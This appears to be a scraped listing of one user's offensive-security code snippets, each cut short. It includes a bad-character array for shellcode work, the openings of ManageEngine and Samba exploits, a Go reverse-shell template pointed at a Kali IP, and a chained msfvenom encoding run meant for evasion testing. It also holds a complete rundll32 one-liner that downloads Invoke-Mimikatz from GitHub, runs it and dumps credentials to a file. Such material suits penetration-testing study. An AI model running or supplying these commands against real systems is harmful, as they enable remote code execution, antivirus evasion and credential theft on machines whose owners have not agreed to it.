joenorton8014

badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"

joenorton8014

#!/usr/bin/python
import requests
import os
import subprocess
import psutil
import time
import sys

# A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
# Based off - https://www.exploit-db.com/exploits/34594/

joenorton8014

#!/usr/bin/python

from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys


# Just a python version of a very simple Samba exploit. 

joenorton8014

#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit. 
# It doesn't have to be pretty because the shellcode is executed
# in the username field. 
#

joenorton8014

#!/usr/bin/python2.7

import qualysapi
import xmltodict
import datetime
import time
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText

joenorton8014

Create text file called shell.go. Change highlighted portion to match your Kali IP:

	package main
	
	
	import (
	        "bufio"
	        "net"
	        "os/exec"
	        "syscall"

joenorton8014

root@kali:~/exploits/msfvenom# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="Helllllllo" -f raw -e x86/shikata_ga_nai --iterations 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o bit9testing.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 334 (iteration=0)
x86/shikata_ga_nai succeeded with size 361 (iteration=1)
x86/shikata_ga_nai succeeded with size 388 (iteration=2)
x86/shikata_ga_nai succeeded with size 415 (iteration=3)
x86/shikata_ga_nai succeeded with size 442 (iteration=4)

joenorton8014

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > test.txt")

joenorton8014

#!/usr/bin/python
import nmap
import os
import sys
import subprocess
import psutil
from datetime import datetime 
import time
import smtplib
from email.MIMEMultipart import MIMEMultipart

joenorton8014

import requests
import os
from progressbar import ProgressBar


pbar = ProgressBar()
baseurl = 'http://10.0.0.55/'
folder_list = '/usr/share/wordlists/dirb/small.txt'